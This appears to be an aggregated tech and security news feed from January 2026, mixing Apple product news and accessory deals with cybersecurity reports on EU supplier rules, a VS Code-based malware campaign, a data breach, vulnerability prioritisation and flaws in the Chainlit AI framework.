Finally, Satechi is hosting a "last chance" sale this week, with up to 30 percent off accessories with a limited supply remaining. In this sale you'll find discounts on MagSafe-compatible wireless charging pads, Thunderbolt docks, and more.

2026 Refresh Sale

Use Code REFRESH20 to see the below deals applied at checkout.

2-in-1 Foldable Qi2 Wireless Charging Stand - $64.00, down from $79.99
Mac Mini Stand and Hub with SSD Enclosure - $80.00, down from $99.99
Slim SM3 Mechanical Backlit Bluetooth Keyboard - $96.00, down from $119.99
3-in-1 Foldable Qi2 Wireless Charging Stand - $104.00, down from $129.99
Qi2 Trio Wireless Charging Pad - $104.00, down from $129.99
200W USB-C 6-Port GaN Hub - $120.00, down from $149.99
Thunderbolt 4 Slim Hub Pro - $160.00, down from $199.99

CES 2026 Sale

Use Code CES2026 to see the below deals applied at checkout.
Slim EX Wireless Mouse - $24.00, down from $29.99
Thunderbolt 5 Pro Cable - $32.00, down from $39.99
Slim EX1 Wireless Keyboard - $40.00, down from $49.99
Slim EX3 Wireless Keyboard - $56.00, down from $69.99
Thunderbolt 5 CubeDock - $320.00 (pre-order), down from $399.99

Last Chance Sale

All deals have been applied automatically and do not require a coupon code.

2-in-1 Headphone Stand with Wireless Charger - $55.99, down from $79.99
USB-C Monitor Stand Hub XL - $69.99, down from $149.99
Pro Hub Max - $69.99, down from $99.99
Duo Wireless Charger Power Stand - $69.99, down from $99.99
Trio Wireless Charger with Magnetic Pad - $83.99, down from $119.99
Thunderbolt 4 Dock - $199.99, down from $299.99



Deals Newsletter

Interested in hearing more about the best deals you can find in 2026? Sign up for our Deals Newsletter and we'll keep you updated so you don't miss the biggest deals of the season!




Related Roundup: Apple Deals
This article, "Refresh Your Workspace for 2026 With 20% Off Satechi's Best Desktop Accessories" first appeared on MacRumors.com

Discuss this article in our forums

View the full article

• 0 comments
• 33 views

reporter

January 21Jan 21

EU reviews cybersecurity to limit danger from high-risk suppliers

EU reviews cybersecurity to limit danger from high-risk suppliers

The European Commission has presented a new cybersecurity package to strengthen the European Union’s resilience to increasing cyber and hybrid attacks from state and criminal actors.
The key is to reduce risks from high-risk suppliers outside the EU, especially in critical infrastructure such as mobile networks, through a common and risk-based framework. The Commission’s news release did not mention any specific suppliers targeted by the measures.
The move should make it possible to reduce the risk to sensitive parts of the EU’s IT ecosystem based on previous work on 5G security.
An updated European Cybersecurity Certification Framework (ECCF) will also make it faster and easier to security test products and services. The package also simplifies compliance with existing cybersecurity rules to reduce the administrative burden, especially for small and medium-sized enterprises.
At the same time, the EU’s cybersecurity agency, ENISA, will be strengthened, among other things by giving it a more central role in threat analysis, incident response, vulnerability management, and coordination within the EU.
The package of measures needs to be approved by the European Parliament and the EU Council of Ministers. Member states will then have one year to implement the changes in their national legislation.
View the full article

• 0 comments
• 53 views

CSOonline

January 21Jan 21

iPhone 18 Rumored to Feature Much Brighter Display

iPhone 18 Rumored to Feature Much Brighter Display

Apple's iPhone 18 will feature a significantly brighter display, according to a Chinese leaker.


In a new post on Weibo, the user known as "Instant Digital" said that Chinese supplier BOE has little hope of making panels for the ‌iPhone 18‌ because Apple's brightness requirements for the next-generation device are unprecedentedly high. This suggests that the ‌iPhone 18‌'s display will see a considerable leap forward in terms of brightness.

The iPhone 13 and ‌iPhone‌ 14 offered a typical maximum brightness of 800 nits, with peak HDR brightness of 1,200 nits. With the ‌iPhone‌ 15, iPhone 16, and iPhone 17 Apple increased this to 1,000 nits typical maximum brightness and 1,600 nits peak HDR brightness. The ‌iPhone 17‌ also saw a notable increase from 2,000 nits of outdoor peak brightness to 3,000 nits.

Earlier today, Korea's The Elec reported that BOE is again struggling with ‌iPhone‌ OLED production, causing millions of panel orders to be shifted to Samsung Display.

The ‌iPhone 18‌ is expected to launch in early 2027, featuring the A20 chip, the C2 modem, and a simpler Camera Control.Related Roundup: iPhone 18Tags: BOE, Instant DigitalRelated Forum: iPhone
This article, "iPhone 18 Rumored to Feature Much Brighter Display" first appeared on MacRumors.com

Discuss this article in our forums

View the full article

• 0 comments
• 35 views

reporter

January 21Jan 21

Operating AI-Driven Detection at Scale | Compuquip

Operating AI-Driven Detection at Scale | Compuquip

Across this series, we’ve looked at how threat detection evolves when AI becomes part of SOC operations from anomaly detection, to triage, to detection engineering. The final challenge is not design. It’s operation.

Deploying AI-driven detection is relatively easy. Sustaining it across analysts, shifts, environments, and time is where most SOCs struggle.
 
At scale, AI becomes an operational dependency. And dependencies require ownership.
View the full article

• 0 comments
• 53 views

compuquip

January 21Jan 21

Apple Defeats Privacy Law Claims in California Data Tracking Suit

Apple Defeats Privacy Law Claims in California Data Tracking Suit

Apple has beaten a class action's claims alleging that it records users' mobile activity without their consent despite the company's privacy assurances, reports Bloomberg Law.


Filed in November 2022, the lawsuit accused Apple of "utterly false" assurances that users are in control of what information they share when they use stock ‌iPhone‌ apps like the App Store and Apple Music.

Specifically, it claimed that Apple's mobile device options to disable the sharing of device analytics and opting out of settings such as "Allow Apps to Request to Track" do nothing to stop Apple from continuing to collect data relating to users' browsing and activity for monetization purposes.

From the Bloomberg report:
This week's ruling only dismissed the California-specific privacy claims. Several other claims in the lawsuit already survived an earlier ruling in September 2024 and remain active.

Those claims – based on the "Share Device Analytics" setting – include breach of contract, unjust enrichment, and violations of consumer protection laws in Illinois, New Jersey, and New York. Judge Davila found that the plaintiffs had sufficiently argued they withdrew consent to data collection by turning off that setting.Tags: Apple Privacy, Apple Lawsuits
This article, "Apple Defeats Privacy Law Claims in California Data Tracking Suit" first appeared on MacRumors.com

Discuss this article in our forums

View the full article

• 0 comments
• 29 views

reporter

January 21Jan 21

OpenAI on Track to Unveil First AI Device This Year, Could Rival AirPods

OpenAI on Track to Unveil First AI Device This Year, Could Rival AirPods

OpenAI is "on track" to unveil its first AI device in the second half of this year, Axios reported this week.


The comment was given to the publication by OpenAI's chief global affairs officer Chris Lehane, who listed "devices" as one of the big coming attractions for the company in 2026.

Lehane didn't go into specifics about the upcoming product, which is being designed by former Apple design chief Jony Ive's oi Products team. Ive's startup officially merged with OpenAI last year after it was acquired for $6.5 billion.

Previous leaks have suggested that the company's first ChatGPT-powered gadget will be pocket-sized, contextually aware of your surroundings and life, and completely screen-free. Details that emerged in court filings last year suggested it would not be a wearable, but an alleged supply chain leak this week points to OpenAI's development of two pill-shaped gadgets that rest behind the ear and go by the codename "Sweetpea."

According to the leaker known as Smart Pikachu, the devices will be metallic and feature a custom 2nm chip to "replace iPhone actions by commanding Siri," suggesting some functional overlap with AirPods. The back-of-the-ear modules are also believed to feature sensors for environmental or contextual awareness, and are stored inside an egg-shaped case.

OpenAI is said to be considering launching several AI products over the next few years, potentially including a pen and a "home-style device." The leak could therefore relate to a different product to the one that OpenAI launches first. That said, Smart Pikachu claims Ive's team is prioritizing the behind-the-ear wearable, which is reportedly being manufactured by Foxconn and could launch as soon as September, so we'll have to wait and see.

Speaking to Axios, Lehane didn't commit to OpenAI's first device actually going on sale this year, but said the company was "looking at something in the latter part [of 2026]."Tags: Jony Ive, OpenAI, Smart Pikachu
This article, "OpenAI on Track to Unveil First AI Device This Year, Could Rival AirPods" first appeared on MacRumors.com

Discuss this article in our forums

View the full article

• 0 comments
• 32 views

reporter

January 21Jan 21

Contagious Interview turns VS Code into an attack vector

Contagious Interview turns VS Code into an attack vector

Threat actors behind the long-running Contagious Interview campaign were seen expanding from traditional social-engineering lures to the abuse of Microsoft Visual Studio Code (VS Code) as an execution and persistence mechanism.
According to new findings from Jamf Threat Labs, the actors are embedding malicious logic directly into VS Code project configurations, allowing code to execute as soon as a victim opens a repository and grants it “trust”.
Rather than relying on standalone malware or exploit chains, the campaign now leans on trusted developer workflows. Victims are lured to clone Git repositories, often under the guise of interview assignments or shared projects. Once opened in VS Code, weaponized configuration files automatically trigger commands that fetch and execute malicious JavaScript payloads.
Instead of targeting operating systems or browsers directly, the DPRK-linked actors are embedding themselves inside this IDE tool developers use every day, to reduce friction, evade suspicion, and achieve stealth within trusted environments.
Weaponized VS Code for a persistent backdoor
The new technique revolves around the abuse of Visual Studio Code’s tasks.json files, which are designed to automate development actions such as builds and scripts. In Jamf-observed attacks, these tasks’ definitions are modified to include hidden commands that execute automatically once the repository is opened and trusted by the user.
Those commands run shell processes that retrieve obfuscated JavaScript from remote infrastructure and pipe it directly into Node.js for execution. Jamf researchers noted that the payloads are often hosted on legitimate platforms such as Vercel, further reducing the likelihood of early detection or blocking. Once running, the JavaScript establishes communication with a remote command-and-control server and enables remote code execution (RCE).
Importantly, the backdoor does not depend on VS Code remaining open. After initial execution, the malicious code can persist independently, meaning closing the IDE does not stop the activity. This turns what appears to be a one-time development task into a long-lived foothold on the victim’s system.
Social engineering to developer trust abuse
The effectiveness of the campaign hinges on social engineering rather than technical exploitation. Victims are tricked into interacting with unfamiliar repositories as part of legitimate-looking projects. Once the repository is opened, VS Code’s built-in trust prompt becomes the key, and approving it enables the malicious task execution chain without further warnings.
Jamf researchers also observed redundancy built into the attack flow. In some cases, attackers included fallback mechanisms, such as dictionary files containing embedded JavaScript, ensuring code execution even if the primary task-based delivery failed. Additional payloads were seen being fetched minutes after the initial execution, suggesting layered persistence and ongoing control.
The researchers shared indicators of compromise (IoCs) associated with the campaign, including malicious infrastructure and artifacts observed during the investigation, to support detection. Additionally, they recommended caution while interacting with unfamiliar repositories, particularly those obtained through third parties or interview-style engagements. “Before marking a repository as trusted in Visual Studio Code, it’s important to review its contents,” they added in a blog post. “Similarly, ‘npm install’ should only be run on projects that have been vetted, with particular attention paid to package.json files, install scripts, and task configuration files to help avoid unintentionally executing malicious code.”
View the full article

• 0 comments
• 30 views

CSOonline

January 21Jan 21

Webinar: How Smart MSSPs Using AI to Boost Margins with Half the Staff

Webinar: How Smart MSSPs Using AI to Boost Margins with Half the Staff

Every managed security provider is chasing the same problem in 2026 — too many alerts, too few analysts, and clients demanding “CISO-level protection” at SMB budgets. The truth? Most MSSPs are running harder, not smarter. And it’s breaking their margins. That’s where the quiet revolution is happening: AI isn’t just writing reports or surfacing risks — it’s rebuilding how security services areView the full article

• 0 comments
• 52 views

Hacker News

January 21Jan 21

Apple Pay Likely to Launch in India This Year

Apple Pay Likely to Launch in India This Year

Apple Pay is set to go live in the Indian market by the end of 2026, according to a new report by Business Standard.


The service still requires regulatory approvals before it can go live in the country, but Apple is reportedly working with banks, regulators, and card networks to bring the payment service to India within the year, claims the publication's sources.

Once launched, Apple Pay is also expected to offer its Tap to Pay on iPhone feature, allowing users in India to make contactless payments at point-of-sale terminals via NFC. But before that can happen, Apple will have to negotiate fees with major card issuers for use of the payment gateway.

UPI dominates digital payments in India, but the report's sources say Apple is unlikely to pursue third-party application provider approval for that system in the near term. Last year, Cashfree Payments and Razorpay integrated Apple Pay to support international payments for Indian merchants.

Apple Pay launched more than 10 years ago, and is already available across 89 markets globally.

The timing comes at a good moment for Apple in India. The company recorded its highest quarterly shipments in the country during Q3 2025, reaching 5 million units and securing fourth place in the market for the first time, according to IDC data.Tags: Apple Pay, India
This article, "Apple Pay Likely to Launch in India This Year" first appeared on MacRumors.com

Discuss this article in our forums

View the full article

• 0 comments
• 32 views

reporter

January 21Jan 21

Hacker erbeuten rund 42.000 Datensätze von Ingram Micro

Hacker erbeuten rund 42.000 Datensätze von Ingram Micro

JHVEPhoto | shutterstock.com
Im Juli 2025 sorgte ein Ransomware-Angriff für verheerende Folgen bei Ingram Micro: Die Logistik des IT-Distributors wurde eine Woche lahmgelegt – davon betroffen war nicht nur der Hauptsitz in den USA, sondern auch der Standort in Deutschland.
Nun hat sich herausgestellt, dass dabei auch sensible Daten abgeflossen sind. Wie Ingram Micro in einer Pflichtmitteilung an US-Behörden bestätigt, sind davon mehr als 42.000 Personen betroffen. Die Täter sind demnach an Informationen von aktuellen und ehemaligen Mitarbeitern sowie Bewerbern gekommen.
Neben Stammdaten wie Namen und Kontaktinformationen wurden dabei auch Geburtsdaten, Ausweis- und Sozialversicherungsnummern offengelegt. Zudem wurden Unterlagen aus Bewerbungsverfahren und Mitarbeiterbeurteilungen entwendet. Der IT-Distributor beschäftigt weltweit rund 23.500 Mitarbeiter.
Kurz nachdem der Angriff bekannt wurde, hatte die Ransomware-Bande Safepay damals verkündet, 3,5 Terabyte Daten von Ingram Micro erbeutet zu haben. Die Gruppe ist im September 2024 aufgetaucht und zählt mittlerweile zu den aktivsten Cyberbanden.
View the full article

• 0 comments
• 266 views

CSOonline

January 21Jan 21

Apple Shifts iPhone OLED Orders to Samsung Amid BOE Troubles

Apple Shifts iPhone OLED Orders to Samsung Amid BOE Troubles

Apple's Chinese supplier BOE is struggling with iPhone OLED production again, causing millions of panel orders to be shifted to Samsung Display, reports The Elec.


Multiple industry sources told the publication that BOE still hasn't resolved manufacturing issues that emerged in November and December of last year. Problems in a specific production process have reportedly forced the company to halt production on some models entirely.

In the second half of 2025, BOE was supplying OLED panels for the iPhone 13, 14, 15, 16, and 17, as well as the more affordable iPhone 16e and its successor, the upcoming 17e. The quality issues are said to be affecting panels for the iPhone 15, 16, and 17 specifically.

This isn't the first time BOE has had a hard time meeting Apple's panel quality requirements, but what's strange in this case is that BOE had been reliably supplying LTPS OLED panels for the iPhone 15 and 16 for some time. The iPhone 17's LTPO panels are more technically demanding, but the older models shouldn't have posed the same challenges.

"BOE had been stably supplying OLED for the iPhone 15 and 16, so the industry finds this puzzling," one source told The Elec.

BOE is now focused on ensuring stable supply for the iPhone 17e, which is expected to launch in the spring. The company holds the largest panel allocation among suppliers for that model.
Apple's Next iPhone: What to Expect From the 2026 iPhone 17e
Meanwhile, Samsung Display has picked up millions of redirected orders over the past two months. BOE shipped around 40 million iPhone OLED panels in 2024, but that figure likely fell short last year due to the reported production setbacks.

The production issues come after a tumultuous year for BOE's relationship with Samsung Display. Samsung had accused BOE of stealing trade secrets and infringing AMOLED patents, leading to an International Trade Commission (ITC) investigation and preliminary import bans against BOE in the U.S.

The ITC initially found trade secret misappropriation and recommended nearly 15 years of import restrictions, but the companies settled in late 2025, and BOE reportedly paid royalties to Samsung to end the dispute.Tags: BOE, Samsung, The Elec
This article, "Apple Shifts iPhone OLED Orders to Samsung Amid BOE Troubles" first appeared on MacRumors.com

Discuss this article in our forums

View the full article

• 0 comments
• 34 views

reporter

January 21Jan 21

Vulnerability prioritization beyond the CVSS number

Vulnerability prioritization beyond the CVSS number

The common vulnerability scoring system (CVSS) has long served as the industry’s default for assessing vulnerability severity. It has become one of the few “sources of truth” for cybersecurity professionals.
And, you know the drill. A new CVE drops; it gets a CVSS score; teams rush to patch the items with the biggest numbers.
It all feels logical, scientific — even objective. But in practice, it often fails us.
In the cases of Equifax, SolarWinds and Log4Shell, a similar pattern has emerged: the actual damage did not stem solely from the technical severity of the flaws, but rather from the manner in which those flaws propagated through interconnected systems. High CVSS scores did not always correlate with high operational impact. Low-scoring assets triggered the cascading failures. Often, a “medium” vulnerability can have the most significant impact due to its location and the systems it interacts with.
CVSS scores have enormous value as a starting point. They do not capture the relational dynamics. They do not demonstrate how one vulnerability’s exploitation may amplify or propagate risk through dependencies, shared credentials or inherited configurations.
We have historically treated vulnerabilities as isolated points on a list, yet the actual risk lies in their connections.
Why the CVSS score isn’t the whole story
The CVSS rating system focuses on the characteristics of a single asset — how easy a flaw is to exploit, whether a patch exists and the potential confidentiality or availability impact. That’s important, and it’s a solid starting point. But it doesn’t account for something crucial: context.
A vulnerability in a tightly isolated sandbox may score a 9.8 but never affect anything else. Meanwhile, a 5.2 in a single sign-on service, the system that every other system trusts, can become a blast radius multiplier. The score alone tells us nothing about how that flaw might ripple across the enterprise.
In the real world, vulnerabilities don’t stay put. They move. They inherit privileges. They hitch rides through pipelines. They land in places no one expected.
Risk isn’t only about severity. It’s about propagation.
A different way to look at vulnerabilities
This is where the unified linkage model (ULM) comes in. Instead of asking, “How bad is this vulnerability on its own?” ULM asks, “What can this vulnerability affect once it starts moving?”
It focuses on three kinds of relationships:
Adjacency: Systems that sit side by side and can influence each other, even without direct data exchange.
Inheritance: Flaws that travel downstream — like a vulnerability hidden inside an open-source library embedded in dozens of applications.
Trust: Systems that depend on each other’s integrity — like identity providers, update services or CI/CD tools.
When you map these relationships, you stop seeing a list of vulnerabilities and start seeing a network of pathways. Suddenly, a seemingly minor flaw can reveal a much larger story.
How vulnerabilities really move
Modern development pipelines make it incredibly easy for vulnerabilities to spread unnoticed. A flawed library pulled into a build is included in a Docker image. That image gets promoted to production. The container gains new permissions. And eventually, an external endpoint exposes it to the internet. By the time someone sees the CVE notification, the vulnerability may already be alive inside mission-critical systems.
The question isn’t just “What’s the score?” — it’s “Where can this go?”
Revisiting Log4Shell through a linkage lens
Log4Shell didn’t become historic because it was technically severe. Hundreds of vulnerabilities are rated critical every year. It became historic because it was everywhere. Log4j was inherited through nested dependencies, embedded in countless libraries and trusted by systems that consumed untrusted data.
It was a perfect storm of inheritance, adjacency and trust.
Log4Shell taught us that a vulnerability’s true danger lies not only in what it is, but in where it lives.
What happens when we score based on linkage?
ULM doesn’t replace CVSS scores. It enhances them. It forces us to think about depth, reach and influence.
A vulnerability in a retired development VM might score 9.8. However, if nothing depends on it, its real-world priority may be low.
Meanwhile, a flaw in a GitHub runner that feeds production builds could score much higher when evaluated through linkage. It sits in a trusted pipeline, inherits credentials and can influence downstream systems. In a ULM view, its urgency skyrockets.
A number alone can mislead. A narrative reveals risk.
How organizations can start using ULM today
This doesn’t require a massive overhaul. It starts with a mindset shift:
Map how systems connect, not just what systems exist. Look for shared components, shared identities, shared pipelines. Ask which systems others trust, depend on or inherit from. Then prioritize vulnerabilities based on where they sit in that network — especially those near identity systems, CI/CD pipelines or widely used shared services. These are the silent amplifiers.
Start small. Focus on the systems with the most downstream influence. The picture will come into focus quickly.
The bottom line
Vulnerability management isn’t a numbers game. It’s a relationship game.
CVSS tells us, in theory, how severe a vulnerability is. ULM helps us understand how dangerous it could be in practice. And in a world of accelerating complexity, automation and interconnected systems, that context is no longer optional.
To defend our environments, we have to stop seeing vulnerabilities as dots. We have to start seeing the lines between them.
That’s where the real risk lives.
This article is published as part of the Foundry Expert Contributor Network.
Want to join?
View the full article

• 0 comments
• 30 views

CSOonline

January 21Jan 21

Exposure Assessment Platforms Signal a Shift in Focus

Exposure Assessment Platforms Signal a Shift in Focus

Gartner® doesn’t create new categories lightly. Generally speaking, a new acronym only emerges when the industry's collective "to-do list" has become mathematically impossible to complete. And so it seems that the introduction of the Exposure Assessment Platforms (EAP) category is a formal admission that traditional Vulnerability Management (VM) is no longer a viable way to secure a modernView the full article

• 0 comments
• 53 views

Hacker News

January 21Jan 21

Chainlit AI Framework Flaws Enable Data Theft via File Read and SSRF Bugs

Chainlit AI Framework Flaws Enable Data Theft via File Read and SSRF Bugs

Security vulnerabilities were uncovered in the popular open-source artificial intelligence (AI) framework Chainlit that could allow attackers to steal sensitive data, which may allow for lateral movement within a susceptible organization. Zafran Security said the high-severity flaws, collectively dubbed ChainLeak, could be abused to leak cloud environment API keys and steal sensitive files, orView the full article

• 0 comments
• 53 views

Hacker News

January 21Jan 21

EU-Kommission will Huawei und ZTE aus Netzen verbannen

EU-Kommission will Huawei und ZTE aus Netzen verbannen

Jacek Wojnarowski – shutterstock.com
Die EU-Kommission will umstrittene Anbieter von Netzwerktechnik künftig in Deutschland und anderen EU-Staaten verbieten können. Bei dem Vorschlag dürfte es insbesondere um chinesische Technologiefirmen wie Huawei und ZTE gehen. Hintergrund ist die Sorge vor Sabotage und Spionage durch Drittstaaten. 
Mit einer entsprechenden Rechtsgrundlage soll die EU-Kommission in letzter Instanz untersagen können, Technik besonders risikobehafteter ausländischer Unternehmen zu nutzen, wie aus einem Gesetzesvorschlag hervorgeht. In dem Entwurf der Kommission werden weder Unternehmen noch Länder genannt. 
Seit Jahren nachdrücklich wiederholte Empfehlungen der Europäischen Kommission an die EU-Länder, Technik von Huawei und ZTE aus Sicherheitsgründen nicht in ihren Mobilfunknetzen zu verwenden, könnten dadurch verpflichtend werden. Aus Sicht der Behörde schließen bislang zu wenig Länder die beiden Hersteller beim Betrieb von 5G-Mobilfunknetzen aus.
2023 hieß es aus der EU-Kommission, von den Herstellern ZTE und Huawei gingen wesentlich höhere Risiken aus als von anderen 5G-Anbietern. Spanien schloss im vergangenen Jahr zunächst dennoch einen millionenschweren Vertrag mit Huawei ab, was die zuständige Vizepräsidentin der EU-Kommission Henna Virkkunen kritisierte.
Huawei und ZTE in deutschen Mobilfunknetzen viel verbaut 
Seit der Einführung der 4. Mobilfunk-Generation vor rund 15 Jahren bildeten Huawei und ZTE das Rückgrat der deutschen Mobilfunknetze (Telekom, Vodafone und vor allem O2 Telefónica). Die beiden chinesischen Ausrüster boten moderne Technologie zu Preisen an, mit denen europäische Konkurrenten wie Ericsson oder Nokia kaum mithalten konnten. 
Der Einsatz der ausländischen Technik geriet in den vergangenen Jahren jedoch wegen vermuteter Sicherheitsrisiken und potenzieller Einflussnahme durch China immer stärker in die Kritik.
Während des Handelskriegs zwischen den USA und China wuchs die Sorge vor Spionage und Sabotage. So wurde befürchtet, dass Inhalte abgehört oder Netze aus der Ferne abgeschaltet werden könnten. Nach jahrelangem Ringen einigte sich in Deutschland im Sommer 2024 das Bundesinnenministerium mit den Netzbetreibern. Demnach dürfen in 5G-Kernnetzen bis spätestens Ende 2026 keine Komponenten von Huawei und ZTE mehr eingesetzt werden. Auf Funkmasten kann noch bis Ende 2029 chinesische Technik verwendet werden.
Verbote in anderen Bereichen kritischer Infrastruktur möglich 
Konkret würde der nun von der EU-Kommission vorgeschlagene Mechanismus es den Brüsseler Netzwächtern erlauben, zusammen mit den Mitgliedstaaten eine Risikobewertung für bestimmte Hersteller zu veranlassen. Wird ein Anbieter als zu risikobehaftet gesehen, könnte die Kommission ihn in einem letzten Schritt auf eine entsprechende Verbotsliste setzen. 
Technik von Herstellern auf dieser Liste dürfte dann nicht mehr in der kritischen Infrastruktur von EU-Ländern verbaut werden, bestehende Komponenten müssten nach dem Vorschlag binnen drei Jahren ersetzt werden.
Komponenten nicht nur im Mobilfunk weit verbreitet
Die Bedenken von Experten gegen den Einsatz von Technik aus China betreffen nicht nur den Mobilfunk. Auch in anderen Bereichen der kritischen Infrastruktur, etwa der Bahn, im Energiesektor oder in städtischen Netzen wurden jahrelang Geräte von Huawei oder ZTE verbaut. 
So ist Huawei etwa Weltmarktführer bei Wechselrichtern für Solaranlagen. Diese smarten Geräte sind ans Netz angeschlossen. Hier befürchten manche Experten ein spezielles Bedrohungsszenario: Wenn ein feindlicher Akteur Tausende dieser Wechselrichter gleichzeitig abschalten oder manipulieren könnte, wäre die Stabilität des Stromnetzes gefährdet.
Auch hier könnte die EU-Kommission dem Gesetzesvorschlag nach zukünftig tätig werden und Hersteller, die ihrer Ansicht nach mit Sicherheitsrisiken verbunden sind, prüfen und ausschließen. 
Bevor die Vorschläge der EU-Kommission umgesetzt werden und die Brüsseler Behörde damit tatsächlich weitreichendere Befugnisse bekommt als bisher, müssen sich das Europaparlament und die EU-Staaten noch mit den Ideen auseinandersetzen. Sie können dabei auch Änderungsvorschläge machen. 
EU-Agentur für Cybersicherheit soll bei Abwehr helfen
Die EU-Kommission will zudem die EU-Cybersicherheitsagentur ENISA mit mehr Befugnissen aufrüsten – und ihr damit auch mehr Aufgaben zu geben. So soll die Agentur mit Sitz in Griechenland etwa gemeinsam mit den nationalen Behörden sogenannte Ransomware-Attacken abwehren. Ransomware ist Schadsoftware, die Daten und Systeme verschlüsselt und erst gegen Zahlung eines Lösegelds wieder freigibt. 
Wie folgenreich solche Cyberangriffe für die Menschen in Europa sein können, hatten zuletzt etwa die zahlreichen Ausfälle und Verspätungen an mehreren europäischen Flughäfen im September des vergangenen Jahres gezeigt. Nachdem ein IT-Dienstleister mit einer Schadsoftware angegriffen wurde, kam es an Flughäfen in Berlin, Brüssel, Dublin und London Heathrow tagelang zu Problemen bei der Passagier- und Gepäckabfertigung.
Zusammen mit den Mitgliedstaaten soll ENISA zudem Schwachstellen in der Cybersicherheit identifizieren und zusätzliche EU-weite Standards festlegen. Für ihre neue Verantwortung bekommt die Agentur den Plänen der EU-Kommission nach dann etwa 100 neue Mitarbeitende zusätzlich sowie deutlich mehr Geld. Auch mit diesen Vorschlägen der Kommission müssen sich das Europaparlament und die EU-Staaten noch befassen. (dpa/jm)

View the full article

• 0 comments
• 36 views

CSOonline

January 21Jan 21

EU-Kommission will Huawei und ZTE aus Netzen verbannen

EU-Kommission will Huawei und ZTE aus Netzen verbannen

Jacek Wojnarowski – shutterstock.com
Die EU-Kommission will umstrittene Anbieter von Netzwerktechnik künftig in Deutschland und anderen EU-Staaten verbieten können. Bei dem Vorschlag dürfte es insbesondere um chinesische Technologiefirmen wie Huawei und ZTE gehen. Hintergrund ist die Sorge vor Sabotage und Spionage durch Drittstaaten. 
Mit einer entsprechenden Rechtsgrundlage soll die EU-Kommission in letzter Instanz untersagen können, Technik besonders risikobehafteter ausländischer Unternehmen zu nutzen, wie aus einem Gesetzesvorschlag hervorgeht. In dem Entwurf der Kommission werden weder Unternehmen noch Länder genannt. 
Seit Jahren nachdrücklich wiederholte Empfehlungen der Europäischen Kommission an die EU-Länder, Technik von Huawei und ZTE aus Sicherheitsgründen nicht in ihren Mobilfunknetzen zu verwenden, könnten dadurch verpflichtend werden. Aus Sicht der Behörde schließen bislang zu wenig Länder die beiden Hersteller beim Betrieb von 5G-Mobilfunknetzen aus.
2023 hieß es aus der EU-Kommission, von den Herstellern ZTE und Huawei gingen wesentlich höhere Risiken aus als von anderen 5G-Anbietern. Spanien schloss im vergangenen Jahr zunächst dennoch einen millionenschweren Vertrag mit Huawei ab, was die zuständige Vizepräsidentin der EU-Kommission Henna Virkkunen kritisierte.
Huawei und ZTE in deutschen Mobilfunknetzen viel verbaut 
Seit der Einführung der 4. Mobilfunk-Generation vor rund 15 Jahren bildeten Huawei und ZTE das Rückgrat der deutschen Mobilfunknetze (Telekom, Vodafone und vor allem O2 Telefónica). Die beiden chinesischen Ausrüster boten moderne Technologie zu Preisen an, mit denen europäische Konkurrenten wie Ericsson oder Nokia kaum mithalten konnten. 
Der Einsatz der ausländischen Technik geriet in den vergangenen Jahren jedoch wegen vermuteter Sicherheitsrisiken und potenzieller Einflussnahme durch China immer stärker in die Kritik.
Während des Handelskriegs zwischen den USA und China wuchs die Sorge vor Spionage und Sabotage. So wurde befürchtet, dass Inhalte abgehört oder Netze aus der Ferne abgeschaltet werden könnten. Nach jahrelangem Ringen einigte sich in Deutschland im Sommer 2024 das Bundesinnenministerium mit den Netzbetreibern. Demnach dürfen in 5G-Kernnetzen bis spätestens Ende 2026 keine Komponenten von Huawei und ZTE mehr eingesetzt werden. Auf Funkmasten kann noch bis Ende 2029 chinesische Technik verwendet werden.
Verbote in anderen Bereichen kritischer Infrastruktur möglich 
Konkret würde der nun von der EU-Kommission vorgeschlagene Mechanismus es den Brüsseler Netzwächtern erlauben, zusammen mit den Mitgliedstaaten eine Risikobewertung für bestimmte Hersteller zu veranlassen. Wird ein Anbieter als zu risikobehaftet gesehen, könnte die Kommission ihn in einem letzten Schritt auf eine entsprechende Verbotsliste setzen. 
Technik von Herstellern auf dieser Liste dürfte dann nicht mehr in der kritischen Infrastruktur von EU-Ländern verbaut werden, bestehende Komponenten müssten nach dem Vorschlag binnen drei Jahren ersetzt werden.
Komponenten nicht nur im Mobilfunk weit verbreitet
Die Bedenken von Experten gegen den Einsatz von Technik aus China betreffen nicht nur den Mobilfunk. Auch in anderen Bereichen der kritischen Infrastruktur, etwa der Bahn, im Energiesektor oder in städtischen Netzen wurden jahrelang Geräte von Huawei oder ZTE verbaut. 
So ist Huawei etwa Weltmarktführer bei Wechselrichtern für Solaranlagen. Diese smarten Geräte sind ans Netz angeschlossen. Hier befürchten manche Experten ein spezielles Bedrohungsszenario: Wenn ein feindlicher Akteur Tausende dieser Wechselrichter gleichzeitig abschalten oder manipulieren könnte, wäre die Stabilität des Stromnetzes gefährdet.
Auch hier könnte die EU-Kommission dem Gesetzesvorschlag nach zukünftig tätig werden und Hersteller, die ihrer Ansicht nach mit Sicherheitsrisiken verbunden sind, prüfen und ausschließen. 
Bevor die Vorschläge der EU-Kommission umgesetzt werden und die Brüsseler Behörde damit tatsächlich weitreichendere Befugnisse bekommt als bisher, müssen sich das Europaparlament und die EU-Staaten noch mit den Ideen auseinandersetzen. Sie können dabei auch Änderungsvorschläge machen. 
EU-Agentur für Cybersicherheit soll bei Abwehr helfen
Die EU-Kommission will zudem die EU-Cybersicherheitsagentur ENISA mit mehr Befugnissen aufrüsten – und ihr damit auch mehr Aufgaben zu geben. So soll die Agentur mit Sitz in Griechenland etwa gemeinsam mit den nationalen Behörden sogenannte Ransomware-Attacken abwehren. Ransomware ist Schadsoftware, die Daten und Systeme verschlüsselt und erst gegen Zahlung eines Lösegelds wieder freigibt. 
Wie folgenreich solche Cyberangriffe für die Menschen in Europa sein können, hatten zuletzt etwa die zahlreichen Ausfälle und Verspätungen an mehreren europäischen Flughäfen im September des vergangenen Jahres gezeigt. Nachdem ein IT-Dienstleister mit einer Schadsoftware angegriffen wurde, kam es an Flughäfen in Berlin, Brüssel, Dublin und London Heathrow tagelang zu Problemen bei der Passagier- und Gepäckabfertigung.
Zusammen mit den Mitgliedstaaten soll ENISA zudem Schwachstellen in der Cybersicherheit identifizieren und zusätzliche EU-weite Standards festlegen. Für ihre neue Verantwortung bekommt die Agentur den Plänen der EU-Kommission nach dann etwa 100 neue Mitarbeitende zusätzlich sowie deutlich mehr Geld. Auch mit diesen Vorschlägen der Kommission müssen sich das Europaparlament und die EU-Staaten noch befassen. (dpa/jm)

View the full article

• 0 comments
• 42 views

CSOonline

January 21Jan 21

VoidLink Linux Malware Framework Built with AI Assistance Reaches 88,000 Lines of Code

